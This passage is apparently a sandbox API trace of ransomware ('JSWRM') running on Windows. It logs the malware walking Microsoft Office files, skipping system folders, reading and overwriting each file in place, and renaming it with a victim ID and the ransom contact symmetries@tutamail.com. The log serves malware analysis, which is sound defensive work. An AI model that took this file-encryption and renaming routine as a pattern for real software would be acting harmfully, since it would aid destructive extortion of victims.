lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.586] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1696) returned 1 [0134.586] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.586] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x6a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x6a0, lpOverlapped=0x0) returned 1 [0134.588] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.588] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x6a0, lpOverlapped=0x0) returned 1 [0134.588] CloseHandle (hObject=0x238) returned 1 [0134.588] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.589] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8edb08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8edb08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a913cc8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6a0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogoSmall.scale-80.png", cAlternateFileName="WIB162~1.PNG")) returned 0 [0134.589] FindClose (in: hFindFile=0x232100 | out: hFindFile=0x232100) returned 1 [0134.589] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7c11d2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdd0d91a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xde4d0d64, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1979a48, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="lync.exe", cAlternateFileName="")) returned 1 [0134.589] lstrcmpiW (lpString1="lync.exe", lpString2=".") returned 1 [0134.589] lstrcmpiW (lpString1="lync.exe", lpString2="..") returned 1 [0134.589] lstrcmpiW (lpString1="lync.exe", lpString2="...") returned 1 [0134.589] lstrcmpiW (lpString1="lync.exe", lpString2="windows") returned -1 [0134.589] lstrcmpiW (lpString1="lync.exe", lpString2="recovery") returned -1 [0134.590] lstrcmpiW (lpString1="lync.exe", lpString2="perflogs") returned -1 [0134.590] lstrcmpiW (lpString1="lync.exe", lpString2="documents and settings") returned 1 [0134.590] lstrcmpiW (lpString1="lync.exe", lpString2="$RECYCLE.BIN") returned 1 [0134.590] lstrcmpiW (lpString1="lync.exe", lpString2="system volume information") returned -1 [0134.590] lstrcmpiW (lpString1="lync.exe", lpString2="msocache") returned -1 [0134.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lync.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0134.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lync.exe", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lync.exe", lpUsedDefaultChar=0x0) returned 8 [0134.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lync.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0134.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lync.exe", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lync.exe", lpUsedDefaultChar=0x0) returned 8 [0134.590] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcca238b3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcca238b3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xccd6abed, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa94, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="LYNC.EXE.MANIFEST", cAlternateFileName="LYNCEX~1.MAN")) returned 1 [0134.590] lstrcmpiW (lpString1="LYNC.EXE.MANIFEST", lpString2=".") returned 1 [0134.590] lstrcmpiW (lpString1="LYNC.EXE.MANIFEST", lpString2="..") returned 1 [0134.590] lstrcmpiW (lpString1="LYNC.EXE.MANIFEST", lpString2="...") returned 1 [0134.590] lstrcmpiW (lpString1="LYNC.EXE.MANIFEST", lpString2="windows") returned -1 [0134.590] lstrcmpiW (lpString1="LYNC.EXE.MANIFEST", lpString2="recovery") returned -1 [0134.590] lstrcmpiW (lpString1="LYNC.EXE.MANIFEST", lpString2="perflogs") returned -1 [0134.590] lstrcmpiW (lpString1="LYNC.EXE.MANIFEST", lpString2="documents and settings") returned 1 [0134.590] lstrcmpiW (lpString1="LYNC.EXE.MANIFEST", lpString2="$RECYCLE.BIN") returned 1 [0134.590] lstrcmpiW (lpString1="LYNC.EXE.MANIFEST", lpString2="system volume information") returned -1 [0134.590] lstrcmpiW (lpString1="LYNC.EXE.MANIFEST", lpString2="msocache") returned -1 [0134.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC.EXE.MANIFEST", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0134.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC.EXE.MANIFEST", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC.EXE.MANIFEST", lpUsedDefaultChar=0x0) returned 17 [0134.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC.EXE.MANIFEST", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0134.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC.EXE.MANIFEST", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC.EXE.MANIFEST", lpUsedDefaultChar=0x0) returned 17 [0134.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LYNC.EXE.MANIFEST" (normalized: "c:\\program files\\microsoft office\\root\\office16\\lync.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0134.591] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=2708) returned 1 [0134.591] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.591] ReadFile (in: hFile=0x45c, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345ec04*=0xa90, lpOverlapped=0x0) returned 1 [0134.593] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.593] WriteFile (in: hFile=0x45c, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345ec00*=0xa90, lpOverlapped=0x0) returned 1 [0134.593] CloseHandle (hObject=0x45c) returned 1 [0134.593] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LYNC.EXE.MANIFEST" (normalized: "c:\\program files\\microsoft office\\root\\office16\\lync.exe.manifest"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LYNC.EXE.MANIFEST.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\lync.exe.manifest.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.594] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x56d17f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x286c9, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="lync.ico", cAlternateFileName="")) returned 1 [0134.594] lstrcmpiW (lpString1="lync.ico", lpString2=".") returned 1 [0134.594] lstrcmpiW (lpString1="lync.ico", lpString2="..") returned 1 [0134.594] lstrcmpiW (lpString1="lync.ico", lpString2="...") returned 1 [0134.594] lstrcmpiW (lpString1="lync.ico", lpString2="windows") returned -1 [0134.594] lstrcmpiW (lpString1="lync.ico", lpString2="recovery") returned -1 [0134.594] lstrcmpiW (lpString1="lync.ico", lpString2="perflogs") returned -1 [0134.594] lstrcmpiW (lpString1="lync.ico", lpString2="documents and settings") returned 1 [0134.594] lstrcmpiW (lpString1="lync.ico", lpString2="$RECYCLE.BIN") returned 1 [0134.594] lstrcmpiW (lpString1="lync.ico", lpString2="system volume information") returned -1 [0134.594] lstrcmpiW (lpString1="lync.ico", lpString2="msocache") returned -1 [0134.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lync.ico", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0134.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lync.ico", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lync.ico", lpUsedDefaultChar=0x0) returned 8 [0134.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lync.ico", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0134.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lync.ico", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lync.ico", lpUsedDefaultChar=0x0) returned 8 [0134.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\lync.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\lync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0134.596] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=165577) returned 1 [0134.596] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.597] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0134.610] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.610] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0134.610] CloseHandle (hObject=0x45c) returned 1 [0134.611] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\lync.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\lync.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\lync.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\lync.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.612] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a913cc8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x223d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Lync2013_Third_Party_Notices.txt", cAlternateFileName="LYNC20~1.TXT")) returned 1 [0134.613] lstrcmpiW (lpString1="Lync2013_Third_Party_Notices.txt", lpString2=".") returned 1 [0134.613] lstrcmpiW (lpString1="Lync2013_Third_Party_Notices.txt", lpString2="..") returned 1 [0134.613] lstrcmpiW (lpString1="Lync2013_Third_Party_Notices.txt", lpString2="...") returned 1 [0134.613] lstrcmpiW (lpString1="Lync2013_Third_Party_Notices.txt", lpString2="windows") returned -1 [0134.613] lstrcmpiW (lpString1="Lync2013_Third_Party_Notices.txt", lpString2="recovery") returned -1 [0134.613] lstrcmpiW (lpString1="Lync2013_Third_Party_Notices.txt", lpString2="perflogs") returned -1 [0134.613] lstrcmpiW (lpString1="Lync2013_Third_Party_Notices.txt", lpString2="documents and settings") returned 1 [0134.613] lstrcmpiW (lpString1="Lync2013_Third_Party_Notices.txt", lpString2="$RECYCLE.BIN") returned 1 [0134.613] lstrcmpiW (lpString1="Lync2013_Third_Party_Notices.txt", lpString2="system volume information") returned -1 [0134.613] lstrcmpiW (lpString1="Lync2013_Third_Party_Notices.txt", lpString2="msocache") returned -1 [0134.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lync2013_Third_Party_Notices.txt", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0134.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lync2013_Third_Party_Notices.txt", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lync2013_Third_Party_Notices.txt", lpUsedDefaultChar=0x0) returned 32 [0134.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lync2013_Third_Party_Notices.txt", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0134.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lync2013_Third_Party_Notices.txt", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lync2013_Third_Party_Notices.txt", lpUsedDefaultChar=0x0) returned 32 [0134.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Lync2013_Third_Party_Notices.txt" (normalized: "c:\\program files\\microsoft office\\root\\office16\\lync2013_third_party_notices.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0134.614] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=8765) returned 1 [0134.614] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.615] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2230, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0x2230, lpOverlapped=0x0) returned 1 [0134.791] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.792] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2230, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0x2230, lpOverlapped=0x0) returned 1 [0134.793] CloseHandle (hObject=0x45c) returned 1 [0134.793] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Lync2013_Third_Party_Notices.txt" (normalized: "c:\\program files\\microsoft office\\root\\office16\\lync2013_third_party_notices.txt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Lync2013_Third_Party_Notices.txt.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\lync2013_third_party_notices.txt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.795] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a8c7801, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a8edb08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb98a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="lync99.exe", cAlternateFileName="")) returned 1 [0134.795] lstrcmpiW (lpString1="lync99.exe", lpString2=".") returned 1 [0134.795] lstrcmpiW (lpString1="lync99.exe", lpString2="..") returned 1 [0134.795] lstrcmpiW (lpString1="lync99.exe", lpString2="...") returned 1 [0134.795] lstrcmpiW (lpString1="lync99.exe", lpString2="windows") returned -1 [0134.795] lstrcmpiW (lpString1="lync99.exe", lpString2="recovery") returned -1 [0134.795] lstrcmpiW (lpString1="lync99.exe", lpString2="perflogs") returned -1 [0134.795] lstrcmpiW (lpString1="lync99.exe", lpString2="documents and settings") returned 1 [0134.795] lstrcmpiW (lpString1="lync99.exe", lpString2="$RECYCLE.BIN") returned 1 [0134.795] lstrcmpiW (lpString1="lync99.exe", lpString2="system volume information") returned -1 [0134.795] lstrcmpiW (lpString1="lync99.exe", lpString2="msocache") returned -1 [0134.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lync99.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lync99.exe", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lync99.exe", lpUsedDefaultChar=0x0) returned 10 [0134.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lync99.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lync99.exe", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lync99.exe", lpUsedDefaultChar=0x0) returned 10 [0134.796] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcca238b3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcca238b3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdee341d6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x23fd640, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="LyncDesktopSmartBitmapResources.dll", cAlternateFileName="LYNCDE~1.DLL")) returned 1 [0134.796] lstrcmpiW (lpString1="LyncDesktopSmartBitmapResources.dll", lpString2=".") returned 1 [0134.796] lstrcmpiW (lpString1="LyncDesktopSmartBitmapResources.dll", lpString2="..") returned 1 [0134.796] lstrcmpiW (lpString1="LyncDesktopSmartBitmapResources.dll", lpString2="...") returned 1 [0134.796] lstrcmpiW (lpString1="LyncDesktopSmartBitmapResources.dll", lpString2="windows") returned -1 [0134.796] lstrcmpiW (lpString1="LyncDesktopSmartBitmapResources.dll", lpString2="recovery") returned -1 [0134.796] lstrcmpiW (lpString1="LyncDesktopSmartBitmapResources.dll", lpString2="perflogs") returned -1 [0134.796] lstrcmpiW (lpString1="LyncDesktopSmartBitmapResources.dll", lpString2="documents and settings") returned 1 [0134.796] lstrcmpiW (lpString1="LyncDesktopSmartBitmapResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0134.796] lstrcmpiW (lpString1="LyncDesktopSmartBitmapResources.dll", lpString2="system volume information") returned -1 [0134.796] lstrcmpiW (lpString1="LyncDesktopSmartBitmapResources.dll", lpString2="msocache") returned -1 [0134.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LyncDesktopSmartBitmapResources.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0134.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LyncDesktopSmartBitmapResources.dll", cchWideChar=35, lpMultiByteStr=0x22d0d8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LyncDesktopSmartBitmapResources.dll", lpUsedDefaultChar=0x0) returned 35 [0134.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LyncDesktopSmartBitmapResources.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0134.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LyncDesktopSmartBitmapResources.dll", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LyncDesktopSmartBitmapResources.dll", lpUsedDefaultChar=0x0) returned 35 [0134.796] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcca238b3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xde77f7db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdec6a56c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x103d248, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="lyncDesktopViewModel.dll", cAlternateFileName="LYNCDE~2.DLL")) returned 1 [0134.796] lstrcmpiW (lpString1="lyncDesktopViewModel.dll", lpString2=".") returned 1 [0134.796] lstrcmpiW (lpString1="lyncDesktopViewModel.dll", lpString2="..") returned 1 [0134.796] lstrcmpiW (lpString1="lyncDesktopViewModel.dll", lpString2="...") returned 1 [0134.796] lstrcmpiW (lpString1="lyncDesktopViewModel.dll", lpString2="windows") returned -1 [0134.796] lstrcmpiW (lpString1="lyncDesktopViewModel.dll", lpString2="recovery") returned -1 [0134.796] lstrcmpiW (lpString1="lyncDesktopViewModel.dll", lpString2="perflogs") returned -1 [0134.796] lstrcmpiW (lpString1="lyncDesktopViewModel.dll", lpString2="documents and settings") returned 1 